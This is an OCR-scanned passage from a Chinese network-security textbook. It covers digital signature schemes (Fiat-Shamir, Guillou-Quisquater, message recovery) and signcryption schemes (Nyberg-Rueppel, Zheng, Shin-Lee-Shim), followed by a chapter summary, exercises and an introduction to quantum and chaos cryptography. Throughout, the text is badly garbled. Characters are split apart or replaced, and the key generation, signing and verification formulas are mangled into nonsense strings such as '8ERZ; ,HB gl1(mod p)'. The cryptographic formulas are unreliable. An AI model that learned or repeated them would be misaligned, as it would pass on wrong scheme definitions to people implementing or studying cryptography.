(4) 计算 出 s==zxe 十 k(mod gq)。 
以 (e,s) 作 为 对 mm 生成 的 数字 签名 。 
3) 数字 签名 的 验证 过 程 
数字 签名 的 收 方 在 收 到 数字 签名 (e,s) 后 ,进行 以 下 步骤 来 验证 签名 的 有 效 性 : 
(1) 验证 是 否 0<e=p。 
(2) 验证 是 否 0s<q。 
(3) 计算 出 v=g'y “(mod p)。 
(4) 计算 出 mm' 二 ve(mod p)。 
(5) 验证 是 否 m ERCMD ,其 中 RCM) 表 示 R 的 值 域 。 
(6) 恢复 出 m= 二 R71! Gm )。 
这 个 签名 方案 的 正确 性 可 以 由 以 下 等 式 证 明 : 
M = we(modp)=g'y el(mod p)=gt "ee(modp)==ge(modp)= 议 


方案 中 元 余 函 数 是 为 了 防止 代 换 攻击 ,在 今后 的 叙述 中 ,为 了 简便 不 再 提 及 元 余 函 数 。 


6.，Meta- 消 息 恢复 签名 方案 

1) 方案 参数 

bp: 大 素数 。 

gq: 大 素数 ,q|(p 一 1)。 

8: 8ERZ; ,HB gl1(mod p), 

ZA: 用 户 A 的 秘密 密 钥 ,za EZ; 。 

ya: 用 户 A 的 公开 密 钥 ,ya 一 g** (mod p)。 

2) 数字 签名 的 生成 过 程 

对 于 待 签名 的 消息 mr, 用 户 A 进行 以 下 步骤 : 

(1) 选择 一 个 随机 数 &(0 二 k 二 gq) ,计算 出 ~ 一 mg “mod p。 

(2) 计算 出 s=k 一 rramod gq。 

以 (r,s) 作 为 对 m 生成 的 数字 签名 。 

3) 数字 签名 的 验证 过 程 

数字 签名 的 收 方 在 收 到 数字 签名 (r,s*) 后 ,进行 以 下 步骤 来 验证 签名 的 有 效 性 : 
7 一 gsyaArmod 轧 


计划 密码 


贡 上 站 


基于 案例 的 网 络 安 会 技术 与 实践 


4.5.3 基于 因子 分 解 问题 的 签名 方案 


1. FiatrShamir 签名 方案 

1) 方案 参数 

n: n 王 pq, 其 中 p 和 g 是 两 个 秘密 的 大 素数 。 

k: 一 个 固定 的 正 整数 。 

yy,…v%: 用 户 A 的 公开 密 钥 ,对 任何 i(1 志 i 三 k) ,y; 都 是 模 的 平方 剩余 。 

zz 和 yat: 用 户 A 的 秘密 密 钥 ,对 任何 i(1<i<R) ,zi= Vyr (mod n)。 

2) 数字 签名 的 生成 过 程 

对 于 待 签名 的 消息 w, 用 户 A 进行 以 下 步骤 : 

(1) 随机 选取 一 个 正 整 数 +。 

(2) 随机 选取 zt 个 介 于 1 和 之 间 的 数 记 ,ro，,… ,rh , 并 对 任何 j(1 志 j 二 四 ) ,计算 出 Rj 二 
ri (mod n), 

(3) 计算 计算 杂凑 值 互 (m ,Ri ,R;,… ,Ri) ,并 依次 取出 电 (m ,Ri,R,,…,R,) 的 前 kt 个 
比特 值 bu by ba bar sb sbi o 


大 


(4) 对 任何 j(1 志 j 壹 有) ,计算 出 s=r; 工 z% (mod )。 


以 (Con busbar Darbar bn),(s1,…,s)) 作 为 对 m 的 数字 签名 。 

3) 数字 签名 的 验证 过 程 

数字 签名 的 收 方 在 收 到 消息 mx 和 数字 签名 (G64 :Dr02 20220000 
5)) 后 ,用 以 下 步骤 验证 : 


本 
(1) 对 任何 j(1 志 j 壹 ) ,计算 出 R= 5 [wy% (mod )。 
i=1 


(2) 计算 HOGn,R’,R;,…,R’)。 

(3) 验证 54 by,0a ,basbn，… ,bn 是否 依 次 是 日 Gm,Ri ,Rs,… ,Ri) 的 前 有 个 比 
特 。 如 果 是 , 则 以 上 数字 签名 是 一 个 有 效 的 数字 签名 。 

这 个 签名 方案 的 正确 性 可 以 由 以 下 算式 证 明 : 


大 天 2 天 天 
R;= ss Ty% (mod n) = (Ts ] 。 TI yw% 三 ll (ziyi)% rR(modn) 
Pa i=1 i=1 i=1 


2，Guillou-Quisquater 签名 体制 

1) 方案 参数 

n: n 二 pq,p 和 g 是 两 个 秘密 的 大 素数 。 

v: (v,(p—1)(g—1))=1。 

用 户 A 的 秘密 密 钥 z: zE€ 2 。 

用 户 A 的 公开 密 钥 y: yEZ; , 且 x"y 二 1(mod n)。 

2) 数字 签名 的 生成 过 程 

对 于 待 签 名 的 消息 w, 用 户 A 进行 以 下 步骤 : 

(1) 随机 选择 一 个 数 kE Zi ,计算 出 =k?(mod n)。 

(2) 计算 出 杂凑 值 : e 一 昌 (m,T) ,上 且 使 1<e<v; 否则 ,重新 进行 步骤 (1); 


(3) 计算 出 * 王 Azemod n。 

以 (e,s) 作 为 对 m 的 数字 签名 。 

3) 数字 签名 的 验证 过 程 

数字 签名 的 收 方 在 收 到 消息 m 和 数字 签名 (e,s) 后 ,用 以 下 步骤 来 验证 : 

(1) 计算 出 T'=s?y* (mod n)。 

(2) 计算 出 eHlm,T)。 

(3) 验证 : Ver(y,(e,s) ,mm) 一 True 和 一 e 一 e。 

各 签名 方案 的 正确 性 可 由 以 下 算式 证 明 : 

T= yy (modn) = (kr) y (modn) = (ry) (modn)=k(modn)=T 


4.5.4 签 窗 方 案 实 例 


1.。Nyberg-Rueppel 认证 加 密 方案 
1) 方案 参数 
pp: 大 素数 。 
d: 大 素数 ,gq|(p 一 1)。 
8: SERZ? ,HB gl1(mod p)。 
AT: 用 户 A 的 秘密 密 钥 ,zAEZ o 
ya: 用 户 A 的 公开 密 钥 ,yA 一 gsCmod p)。 
FB: 用 户 B 的 秘密 密 钥 TBE Zp o 
ya: 用 户 B 的 公开 密 钥 ,ys 二 g's (mod p)。 
2) 密 文 的 生成 过 程 
对 于 消息 m,A 进行 以 下 步骤 : 
(1) 选择 &,LEZ; ,计算 出 r=mg “mod p。 
(2) 计算 出 s=k 一 rramod gq。 
(3) 利用 ElGamal 密码 体制 加 密 x。 
a=g modp, c=rybmodp 
以 (ci,cs,s) 作 为 m 的 密 文 。 
3) 消息 恢复 和 验证 签名 过 程 
B 在 收 到 密 文 (ci ,cs ,s) 后 ,进行 以 下 步骤 来 验证 签名 的 有 效 性 : 
(1) 解密 rr,r 一 cs (c1) mod p。 
(2) 恢复 消息 (验证 签名 ) ,m= 二 rg’y% mod p。 
当 A 拒绝 承认 她 发 送 的 消息 时 ,B 可 以 向 第 三 方 出 示 ~, 第 三方 可 以 通过 验证 mm 二 
rg'yamod p 解决 这 一 纠纷 。 该 方案 中 A 和 B 执行 的 模 指 数 运算 次 数 均 为 3 次 。 
2. zheng 签 密 方 案 
1997 年 ,Zheng 提出 了 数字 签 密 的 概念 及 相应 方案 ,数字 签 密 实质 上 是 结合 签名 和 加 
密 为 一 个 步骤 的 认证 加 密 方 案 。 
1) 方案 参数 
p: 大 素数 。 
q: 大 素数 ,gq|(p 一 1)。 


只 


计划 窗 码 


山名 


秦 于 案例 的 网 络 安全 技术 与 实践 


g: gERZ;» ,HB gl1(mod p)。 
hash: 单 向 hash 函数 。 
KH: 钥 控 的 单 向 hash 函数 。 
(E,D): 私 钥 密码 的 加 密 算法 和 解密 算法 。 
zaA: 用户 A 的 秘密 密 钥 ,za€ Z; 。 
ya: 用 户 A 的 公开 密 钥 ,ys 王 g** (mod p)。 

za: 用户 B 的 秘密 密 钥 ,zs€ 2 。 

ys: 用 户 B 的 公开 密 钥 ,ys 二 g's (mod p)。 

2) 密 文 的 生成 过 程 

对 于 消息 m,A 进行 以 下 步骤 : 

(1) 选择 zE2Zy; ,计算 k= 二 yE mod p, 且 将 分 成 长 度 相 当 的 &， 和 心 。 

(2) 计算 r=KHi, (m)。 

(3) 计算 s=zx/(r 十 xa)mod g。 

(4) 计算 c=En (1) 。 

以 (c,r,s) 作 为 m 的 密 文 。 

3) 解 签 密 过 程 

B 在 收 到 密 文 (c,r,s) 后 ,进行 以 下 步骤 来 解 签 密 : 

(1) 计算 k= (ki,ks)= 二 (ya * g')'' mod p。 

(2) 计算 m= D, (c)。 

(3) 计算 KHi, (m0) ,如 果 KHi, (xm) 一 ~, 则 接受 冯 是 A 发 出 的 。 

当 A 拒绝 承认 她 发 送 的 消息 时 ,B 可 以 向 第 三 方 出 示 &, 并 利用 证 明 两 个 离散 对 数 相 等 
的 零 知识 证 明 技 术 向 第 三 方 证 明 的 正确 性 。 该 方案 中 A 和 B 执行 的 模 指数 运算 次 数 分 
别 为 1 次 和 2 次 ,因此 效率 远 高 于 Nyberg-Rueppel 方案 。 遗憾 的 是 ,在 该 方案 中 ,任何 知道 
k 的 第 三 方 都 可 以 求 出 A 和 B 之 间 的 Diffie-Hellman 密 钥 ,从 而 可 以 恢复 A 和 了 之 间 的 其 
他 密 文 , 即 Zheng 方案 的 不 可 否认 性 是 建立 在 丧失 保密 性 的 基础 上 的 。 

3. Shin-Lee-Shim 签 密 方案 

1) 方案 参数 

p: 大 素数 。 

gq: 大 素数 ,qd| (2 一 1)。 

8g: gERZ; , 且 5?"=1(mod p)。 

hash: 单 向 hash 函数 。 

(E,D): 私 钥 密 码 的 加 密 算 法 和 解密 算法 。 

ZaA: 用 户 A 的 秘密 密 钥 ,zaE€ Zs o 

ya: 用 户 A 的 公开 密 钥 ,y= 二 g** (mod p)。 

za: 用户 B 的 秘密 密 钥 ,rs€ 2 。 

ys: 用 户 B 的 公开 密 钥 ,y 二 g”3 (mod p)。 

2) 密 文 的 生成 过 程 

对 于 消息 mm, 用 户 A 进行 以 下 步 又: 

(1) 选择 zxEZ: ,计算 k=y& mod p。 


(2) 计算 Ki 二 hash(K)。 

(3) 计算 k=g* mod p。 

(4) 计算 r=k mod gq。 

(5) 计算 有 =hash(m)。 

(6) 计算 s=(h 十 TA7)/x mod gq。 

(7) 计算 e1=h/s mod g 和 es 二 r/s mod gq。 

(8) 计算 c=Ex (mo,e1,es)。 

以 (k,c) 作 为 m 的 密 文 。 

3) 解 签 密 过 程 

B 在 收 到 密 文 (&,c) 后 ,进行 以 下 步骤 来 解 签 密 : 

(1) 计算 K=k*s mod p。 

(2) 计算 Ki 二 hash(K)。 

(3) 计算 Gn,e ,es) 二 Di (c)。 

当 A 拒绝 承认 他 发 送 的 消息 时 ,B 计 算 r=g%yx mod p mod g 和 s 二 r/es mod g 并 向 第 
三 方 出 示 (m,r,s) ,第 三 方 通过 验证 r=gtm yg mod p mod g 来 解决 这 一 纠纷 。 该 方 
案 可 以 弥补 Zheng 方案 的 不 足 , 且 A 和 B 执 行 的 模 指 运 算 次 数 分 别 为 2 次 和 3 次 ,因此 效 
率 仍 高 于 Nybegr-Rueppel 认证 加 密 方案 。 


4.6 小 结 


信息 加 密 是 保障 信息 安全 最 核心 的 技术 措施 和 理论 基础 , 它 采 用 密码 学 的 原理 与 方法 
对 信息 进行 可 道 的 数学 变换 ,从 而 使 非法 接 入 者 无 法 理解 信息 的 真正 含义 ,达到 保证 信息 机 
密 性 的 目的 。 现 代 密 码 按照 使 用 密 钥 方式 的 不 同 , 可 分 为 单 钥 密 码 体 制 和 双 钥 密码 体制 两 
类 。 按 照 加 密 模 式 的 差异 , 单 钥 密 码 体 制 有 序列 密码 (也 称 流 密码 ) 和 分 组 密码 两 种 方式 , 它 
不 仅 可 用 于 数据 加 密 ,也 可 用 于 消息 认证 ,其 中 ,最 有 影响 的 单 钥 密 码 是 DES 算法 和 IDEA 
算法 。 双 钥 密码 体制 的 加 密 密 钥 和 解密 密 钥 不 同 , 在 网 络 通信 中 ,主要 用 于 认证 (如 数字 签 
名 .身份 识别 等 ) 和 密 钥 管理 等 ,其 优秀 的 算法 有 基于 素数 因子 分 解 问题 的 RSA 算法 和 基于 
离散 对 数 问题 的 EIGamal 算法 。 双 钥 密 钥 体制 是 一 种 非常 有 前 途 的 加 密 体 制 。 

网 络 数 据 加 密 常 见 的 方式 有 链 路 加 密 ` 节 点 加 密 和 端 到 端 加 密 3 种 。 链 路 加 密 是 对 网 
络 中 两 个 相 邻 节点 之 间 传输 的 数据 进行 加 密 保护 ; 节点 加 密 是 指 在 信息 传输 路 过 的 节点 处 
进行 解密 和 加 密 ; 端 到 端 加 密 是 指 对 一 对 用 户 之 间 的 数据 连续 地 提供 保护 。 在 认证 技术 领 
域 ,通过 使 用 密码 手段 ,一 般 可 以 实现 3 个 目标 , 即 消息 完整 性 认证 、 身 份 认证 ,以 及 消息 的 
序号 和 操作 时 间 ( 时 间 性 ) 等 的 认证 。 认 证 技术 模型 在 结构 上 由 安全 管理 协议 、 认 证 体制 和 
密码 体制 3 层 组 成 。 

PKI 是 一 个 采用 公 钥 密码 算法 原理 和 技术 来 提供 安全 服务 的 通用 性 基础 平台 ,用 户 可 
以 利用 PKI 平 台 提供 的 安全 服务 进行 安全 通信 ,PKI 采用 标准 的 密 钥 管 理 规则 ,能 够 为 所 
有 应 用 透明 地 提供 采用 加 密 和 数字 签名 等 密码 服务 所 需要 的 密 钥 和 证 书 管理 。PKI 在 组 成 
上 主要 包括 认证 机 构 CA .证 书库 、 密 钥 备 份 ( 即 恢复 系统 ) \ 证 书 作废 处 理 系 统 、PKI 应 用 接 
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秦 于 案例 的 网 络 安 会 技术 与 实践 


口 系统 等 。 

网 络 安全 中 主要 攻击 手段 与 防御 策略 如 图 4. 19 所 示 : 攻击 者 外 显 行为 分 别 是 信息 窃 
取 , 信 息 自 改 ,信息 抵赖 和 信息 冒充 ,其 所 对 应 的 防范 措施 分 别 为 加 密 技术 、 完 整 性 技术 、 数 
字 签 名 和 认证 技术 。 


图 4.19 网 络 安全 中 主要 攻击 手段 与 防御 策略 


4.7 习 题 


1. 加 密 体 制 分 为 哪 两 类 ? 各 有 什么 特点 ? 它们 之 间 可 和 否 相 互 取代 ,为 什么 ? 

2. 小 明 在 他 的 计算 机 上 ,只 用 加 法 ( 模 2 加 ) 密 码 发 送信 息 给 朋友 。 他 认为 如 果 他 对 信 
息 进 行 两 次 加 密 ,每 次 都 用 不 同 的 密 钥 会 更 安全 。 他 的 想法 对 吗 ? 说 明理 由 。 

3. 回答 下 列 关 于 DES 中 换 字 盒 的 问题 : 

(1) 表示 出 使 110111 通过 换 字 盒 3 的 结果 。 

(2) 表示 出 使 001100 通过 换 字 盒 4 的 结果 。 

(3) 表示 出 使 000000 通过 换 字 盒 7 的 结果 。 

(4) 表示 出 使 111111 通过 换 字 盒 2 的 结果 。 

. DES 中 表示 出 十 六 进 制 数 0110 1023 4110 1023 通过 初始 置换 盒 的 结果 。 

. 在 RSA 中 ,用 户 为 什么 不 能 选择 1 或 2 作为 公 钥 e? 

. 认证 协议 基本 技术 可 分 为 哪 几 种 ? 挑战 -应 答 机 制 与 时 戳 / 序 列 号 机 制 主要 区 别 ? 
. 数字 签名 与 消息 认证 的 主要 区 别 ? 

8. 哈 希 函数 具有 两 种 属性 : 抗 碰撞 性 (Collision-Resistance ) 与 伪 随 机 人 性 
(Pseudorandomness) , 哪 种 属性 更 强 ? 换 句 话说 ,如 果 一 个 哈 希 函数 是 抗 碰 撞 的 , 它 一 定 是 
伪 随 机 的 吗 ? 反 过 来 说 呢 ? 请 说 明 那 种 说 法 正确 ,给 出 实例 证 明 。 

9. 单项 选择 题 

(1) 假设 使 用 一 种 加 密 算 法 , 它 的 加 密 方 法 很 简单 : 将 每 一 个 字母 加 5, 即 a 加密 成 f。 
这 种 算法 的 密 钥 就 是 5, 那 么 它 属于 


A 


A. 对 称 加 密 技 术 B. 分 组 密码 技术 


C. 公 钥 加 密 技 术 D. 单 向 函数 密码 技术 
(2) 密码 学 的 目的 是 

A. 研究 数据 加 密 B. 研究 数据 解密 

C. 研究 数据 保密 D. 研究 信息 安全 


(3) 数字 签名 要 预先 使 用 单 向 Hash 函数 进行 处 理 的 原因 是 
A. 多 一 道 加 密 工序 使 密 文 更 难 破译 
B. 提高 密 文 的 计算 速度 
C. 缩小 签名 密 文 的 长 度 ,加 快 数字 签名 和 验证 签名 的 运算 速度 
D. 保证 密 文 能 正确 还 原 成 明文 
(4) 设 哈 希 函数 瓦 有 128 个 可 能 的 输出 ( 即 输出 长 度 为 128 位 ) ,如 果 互 的 k 个 随机 输 


和 中 至 少 有 两 个 产生 相同 输出 的 概率 大 于 0.5, 则 “ 约 等 于 。 
A Bi 2 
C2 De 2 


10. 什么 是 密码 分 析 , 其 攻击 类 型 有 哪些 ? DES 算法 中 S 盒 的 作用 是 什么 ? 
11. 描述 DES 的 加 密 思想 和 下 函数。 
12. 分 组 密码 的 工作 模式 有 哪些 ? 其 优 缺 点 如 何 ? 


4.8 实 验 
1. DES 加 解密 算法 的 实现 。 


2. 文档 的 数字 签名 及 加 密 。 
3. 设计 一 种 可 抵抗 重 放 攻 击 的 密 钥 交换 协议 。 
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第 5 章 物理 密码 


世界 上 有 两 门 学 问 公认 上 比较 难 ; 一 门 是 密码 学 ,一 门 是 量子 物理 。 难 的 原因 完全 
不 同 : 密码 学 难 是 因为 世界 上 有 人 太 陪 明 , 难 在 巧夺天工 的 构造 和 叹为观止 的 分 析 ; 
量子 物理 难 是 因为 大 自然 深奥 难 测 ,其 微观 规律 远离 我 们 的 直觉 , 难 在 真正 的 理解 和 把 

握 。 量 子 密码 学 要 把 两 者 结合 起 来 ,其 难度 可 想 而 知 。 
一 一 杨 理 


物理 是 宇宙 的 操作 系统 。 


—Steven R Garman 


5.1 两 种 主要 的 物理 密码 


物理 密码 是 指 以 承载 信息 的 载体 即 各 种 物理 信号 和 相应 的 物理 系统 的 内 在 物理 属性 对 
信息 进行 密码 处 理 , 是 一 种 非 数 学 的 加 密 理论 与 技术 , 即 物理 密码 的 构造 基础 是 物理 系统 的 
本 身 课 性 ,而 不 依赖 于 算法 复杂 度 。 


5.1.1 量子 密码 


量子 密码 装置 一 般 采 用 单个 光子 实现 ,根据 海 森 堡 的 测 不 准 原理 ,测量 这 一 量子 系统 会 
对 该 系统 产生 干扰 并 且 会 产生 出 关于 该 系统 测量 前 状态 的 不 完整 信息 。 因 此 ,窃听 一 量子 
通信 信道 就 会 产生 不 可 避免 的 干扰 ,合法 的 通信 双方 则 可 由 此 而 察觉 到 有 人 在 窃听 。 量 子 
密码 术 利 用 这 一 效应 ,使 从 未 见 过 面 且 事先 没有 共享 秘密 信息 的 通信 双方 建立 通信 密 钥 , 然 
后 再 采用 Shannon 已 证 明 的 是 完善 保密 的 一 次 一 密 钥 密码 通信 , 即 可 确保 双方 的 秘密 不 泄漏 。 

量子 密码 学 达到 了 经 典 密码 学 所 无 法 达到 的 两 个 最 终 目 的 : 一 是 合法 的 通信 双方 可 察 
觉 潜 在 的 窃听 者 并 采取 相应 的 措施 ; 二 是 使 窍 听 者 无 法 破解 量子 密码 ,无 论 企图 破译 者 有 
多 么 强大 的 计算 能 力 。 如 图 5. 1 所 示 ,计算 密码 与 物理 密码 的 理论 基础 不 同 ， 


数学 难题 被 破解 量子 力学 理论 被 破解 ? 


传统 加 密 不 再 适应 适应 
量子 加 密 不 再 适应 ? 


T 一 1 时 间 
量子 计算 机 的 产生 新 的 物理 理论 的 产生 ? 
图 5.1 计算 密码 与 物理 密码 的 理论 基础 不 同 


。 传统 加 密 方式 以 数学 计算 (例如 大 数 分 解 ) 为 基础 。 

。 量 子 加 密 则 以 量子 力学 为 基础 。 

由 量子 力学 理论 上 提出 设想 ,到 今天 百 公里 远 的 密 钥 分 配 实验 的 成 功 ,接近 实用 化 的 量 
子 密 钥 传输 系统 只 用 了 几 年 时 间 , 说 明 社会 对 它 需求 的 迫切 性 , 它 的 前 景 是 非常 广阔 的 。 


5.1.2 混沌 密码 


“混沌 (Chaos) 一 词 很 早 即 在 古代 中 国 和 希腊 出 现 。 而 现代 意义 上 的 混沌 是 指 在 确定 
性 的 非 线性 系统 中 出 现 的 一 种 类 似 随 机 的 不 确定 行为 。 混 沌 系统 的 最 大 特点 就 在 于 系统 的 
演化 对 初始 条 件 极端 敏感 ,这 就 导致 了 混沌 系统 的 行为 从 长 期 意义 上 讲 是 不 可 预测 的 。 

1814 年 , 拉 普 拉 斯 认为 : 只 要 知道 了 某 一 时 刻 施加 于 自然 的 所 有 作用 力 以 及 自然 界 所 
有 组 成 部 分 的 状态 ,就 可 以 把 宇宙 中 最 重 的 天 体 和 最 轻 的 原子 运动 ,都 纳入 一 个 公式 和 方程 
中 ,精确 地 计算 出 它们 的 过 去 和 未 来 的 任何 时 候 的 状况 。“ 拉 普 拉 斯 决定 论 ” 在 很 长 时 期 内 
被 认为 是 正确 的 ,但 混沌 现象 及 其 理论 则 使 庞 加 莱 认 为 “ 拉 普 拉 斯 决定 论 ” 值 得 商 椎 。 庞 加 
莱 的 这 一 论点 没有 得 到 重视 ,但 他 却 成 为 最 先 了 解 混 沌 存在 的 可 能 性 的 第 一 人 。 庞 加 莱 和 
他 那 一 时 代 的 人 们 没有 发 现 混沌 并 非 偶 然 。 自 从 牛顿 以 来 拉 普 拉 斯 决定 论 就 占据 着 统治 地 
位 ,许多 实验 中 与 混沌 相关 的 现象 都 被 认为 是 由 噪声 引起 的 ,因而 往往 被 忽略 。 

混沌 学 诞生 于 20 世纪 60 年 代 。1963 年 ,美国 气象 学 家 洛 仑 兹 (Lorenz) 提 出 了 描述 热 
对 流 不 稳定 性 的 模型 ,现在 统称 为 Lorenz 模型 ,这 是 历史 上 最 早 揭示 混沌 运动 的 模型 。 洛 
仑 效 发 现 气 候 不 可 能 精确 重演 ,指出 了 非 周 期 性 与 不 可 预见 性 之 间 的 联系 , 即 著名 的 “蝴蝶 
效应 ”, 这 才 使 混沌 研究 进入 了 飞速 发 展 时 期 ,进而 成 为 一 门 新 的 学 科 一 一 混沌 学 。 混 沌 现 
象 不 仅仅 存在 于 气象 学 中 。 在 自然 界 中 ,混沌 现象 是 很 普遍 的 。 

混沌 是 一 种 貌似 无 规则 的 运动 , 指 在 确定 性 非 线性 系统 中 ,不 需 附 加 任何 随机 因素 亦 可 
出 现 类 似 随 机 的 行为 。 特 点 : 对 初始 条 件 十 分 敏感 ,从 长 期 意义 上 来 讲 , 系 统 的 行为 是 不 可 
预测 的 。 在 对 客观 世界 的 描述 中 , 纯 确 定论 和 纯 概 率 论 都 是 一 种 理想 化 的 描述 , 它 涉 及 某 种 
无 穷 过程 的 极限 。 混 沌 可 以 使 人 们 将 确定 论 和 概率 论 从 根深 蒂 固 的 对 立 关系 中 统一 起 来 ， 
解释 真实 世界 的 复杂 系统 。 混 沌 系统 具有 和 良好 的 伪 随 机 特性 、 轨 道 的 不 可 预测 性 .对 初始 状 
态 及 控制 参数 的 敏感 性 等 一 系列 特性 ,这些 特 性 与 密码 学 的 很 多 要 求 是 吻合 的 ,混沌 密码 学 
在 1990 年 前 后 开始 兴起 , 它 与 通信 理论 .密码 学 的 领域 交叉 如 图 5. 2 所 示 。 大 致 可 以 分 为 
两 个 大 的 研究 方向 : 

(1) 以 混沌 同步 技术 为 核心 的 混沌 保密 通信 系统 ,主要 基于 模拟 混沌 电路 系统 。 

(2) 利用 混沌 系统 构造 新 的 流 密码 和 分 组 密码 ,主要 基于 计算 机 有 限 精 度 下 实现 的 数 
字 化 混沌 系统 。 

混沌 系统 具有 良好 的 伪 随 机 特性 、 轨 道 的 不 可 预测 性 、 对 初始 状态 及 控制 参数 的 敏感 性 
等 一 系列 特性 ,这 些 特性 与 密码 学 的 很 多 要 求 是 吻合 的 ,混沌 密码 学 在 1990 年 前 后 开始 兴 
起 。 大 致 可 以 分 为 两 个 大 的 研究 方向 : 

(1) 以 混沌 同步 技术 为 核心 的 混沌 保密 通信 系统 ,主要 基于 模拟 混沌 电路 系统 。 

(2) 利用 混沌 系统 构造 新 的 流 密码 和 分 组 密码 ,主要 基于 计算 机 有 限 精度 下 实现 的 数 
字 化 混沌 系统 。 实 际 上 ,其 他 很 多 领域 也 开展 了 利用 混沌 系统 应 用 的 研究 工作 ,不 少 研究 结 
果 可 资 混沌 密码 学 借鉴 。 比 较 重要 的 研究 包括 : 混沌 通信 (混沌 调制 、 混 沌 键 控 、 混 沌 扩 频 、 
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图 5.2 混沌 密码 学 领域 交叉 示意 图 


混沌 掩盖 ……); 混沌 伪 随 机 序列 (与 混沌 扩 频 有 密切 关系 ); 混沌 信号 检测 (与 混沌 密码 分 
析 相 关 ) ; 混沌 数字 水 印 ( 大 部 分 思路 与 数字 混沌 密码 类 似 ) 。 


5.2 量子 密码 研究 综述 


量子 信息 论 包括 量子 通信 和 量子 计算 两 个 部 分 。 它 是 量子 力学 在 经 典 信息 论 领 域 中 应 
用 的 结果 。 它 发 源 于 20 世纪 70 年 代 ,20 世纪 80 年 代 开 始 发 展 ,至 今 不 过 30 余年 的 时 间 。 
目前 它 已 经 在 全 世界 鞍 勃 发 展 , 处 于 全 面 推进 之 中 。 

它 之 所 以 如 此 迅速 发 展 , 是 由 于 : 

(1) 应 用 潜力 巨大 。 它 的 成 功 将 会 从 根本 上 改变 现 有 电子 通信 和 计算 机 的 面貌 。 

(2) 本 身 魅 力 非凡 。 它 不 仅 极 大 丰富 了 现 有 的 量子 理论 ,而且 有 助 于 解决 量子 理论 基 
础 中 久 悬 未 决 的 难题 。 

相对 于 以 前 所 知道 的 传统 量子 力学 .量子 信息 论 中 的 量子 力学 ,其 进展 在 于 : 

(1) 所 研究 的 量子 体系 不 再 是 孤立 的 ,而 是 开放 的 。 

(2) 与 此 相应 ,一 般 地 说 ,体系 状态 大 多 为 混 态 ,演化 是 非 么 正 的 ,对 体系 的 测量 是 非 正 
交 的 投影 。 

(3) 观念 上 已 经 提升 到 将 量子 态 看 作 是 信息 的 载体 ,主动 进行 相关 的 制备 .操控 、 存 储 
和 传送 。 

21 世纪 是 信息 的 时 代 , 除 了 电子 信息 科学 技术 继续 高 速 发 展 之 外 ,量子 和 生物 等 一 些 
新 型 的 信息 科学 技术 正在 发 展 与 建立 。 

量子 计算 机 已 经 诞生 。2001 年 IBM 公司 率先 研制 成 功 了 7qbit 的 示例 性 的 量子 计算 
机 。2007 年 2 月 份 ,加 拿 大 D-wave 公司 宣布 研制 成 功 16qbit 量子 计算 机 系统 。2008 年 提 
高 到 48qbit ,并 公布 了 128qbit 的 处 理 器 设计 图 。2011 年 5 月 23 日 ,加拿大 量子 计算 公司 D 


-Wave 正式 发 布 了 全 球 第 一 款 商 用 型 量子 计算 机 “D-Wave One”, 量 子 计算 机 的 梦想 距离 我 
们 又 近 了 一 大 步 。D-Wave 公司 的 口号 就 是 “Yes, you can have one.”。 虽 然 量 子 计算 机 在 
向 实用 化 发 展 的 道路 上 还 有 许多 困难 ,但 是 量子 计算 机 诞生 是 伟大 的 ,其 规模 将 会 随 着 时 间 
和 技术 逐步 提升 。 


5.2.1 量子 密码 与 经 典 密码 的 辩证 关系 


密码 是 按 特定 的 法 则 编 成 用 以 对 通信 双方 的 信息 进行 明 密 变换 的 符号 序列 。 根 据 这 个 
定义 ,量子 密码 就 是 以 量子 法 则 (量子 编码 规则 ) 为 基础 ,利用 量子 态 作为 符号 而 实现 的 
密码 。 

经 典 密码 学 (计算 密码 ) 的 理论 基石 是 单 向 函数 的 存在 性 。 公 钥 加 密 要 求 陷 门 单 向 函数 
存在 ; 私 钥 加 密 的 语义 安全 性 蕴涵 着 单 向 函数 存在 ; MAC、 鉴 别 等 都 要 求 抗 碰 撞 单 向 函数 
存在 ,计算 密码 离 不 开 单 向 函数 ,犹如 人 离 不 开 空气 。 如 果 把 计算 密码 粗略 地 划分 成 两 部 
分 , 则 一 部 分 是 基于 随机 性 或 信息 论 的 理论 , 另 一 部 分 是 基于 困难 问题 或 单 向 函数 的 理论 。 
这 两 部 分 是 密切 相关 的 : 单 向 函数 蕴涵 核心 断言 (hard-core Predicates) 谓 词 ,hard-core 意 
味 着 蕴涵 伪 随机 性 , 伪 随 机 性 又 表明 真 随机 数 不 可 得 ,这 是 个 哲学 问题 一 一 矛盾 存在 的 普遍 
性 : 我 们 用 一 个 “假想 安全 ”的 基石 去 构造 “可 证 明 安 全 ”的 大 厦 ,然后 表示 此 大 厦 “ 真 ”安全 。 
这 说 明 , 算 法 能 否 生 成 伪 随 机 数 则 依赖 于 困难 问题 或 单 向 函数 是 不 是 真正 存在 ,计算 密码 的 
困惑 显而易见 : 困难 问题 的 困难 性 即 单 向 函数 的 单 向 性 并 没有 获得 证 明 。 这 就 引出 了 量子 
密码 存在 的 必要 性 。 

量子 密码 学 的 存在 必要 性 关键 在 于 其 安全 性 来 源 于 任何 窃听 都 能 被 发 现 这 一 理论 ,而 
这 一 理论 之 所 以 在 量子 密 钥 分 发 0(QKD,Quantum Key Distribution) 中 成 立 的 根本 原因 是 
基于 量子 的 两 个 物理 训 性 2: 


@ 目前 通常 所 说 的 量子 密码 ,甚至 量子 通信 , 指 的 仅仅 是 量子 密 钥 分 发 (QKD) ,因此 QKD 实例 具有 代表 性 。 从 物 
理 原理 上 讲 ,QKD 系统 的 全 系统 工作 流程 有 6 步 : 
。 量子 态 的 制备 。 发 送 方 量子 密码 系统 中 的 实际 安全 性 与 关键 技术 随机 制备 出 量子 态 一 一 理论 上 要 求 制备 出 的 量 
子 态 是 真 随机 的 。 
。 量子 态 的 传输 。 将 前 一 步 制备 出 的 量子 态 在 信道 中 进行 传输 ,如 果 在 传输 中 有 窃听 , 则 会 导致 传输 信道 产生 远 高 
于 正常 值 的 额外 噪声 ,从 而 使 窃听 被 发 现 。 
。 量子 态 的 测量 。 接 收 方 随机 选取 测量 基 , 并 进行 光电 探测 。 
。 测量 基 的 比 对 。 发 送 方 和 接收 方 通 过 公开 信道 进行 比 对 ,剔除 误 码 。 
。 量子 误 码 纠 错 。 利 用 编码 方式 剔除 传输 中 的 各 种 误 码 。 
。 量子 私 钥 放 大 。 进 一 步 剔 除 不 可 信 的 码 。 
上 述 前 3 步 属 于 QKD 系统 的 物理 部 分 ; 后 3 步 是 数学 部 分 (后 处 理 )。 另 外 ,完整 的 QKD 步骤 中 还 隐 含 了 一 个 发 送 
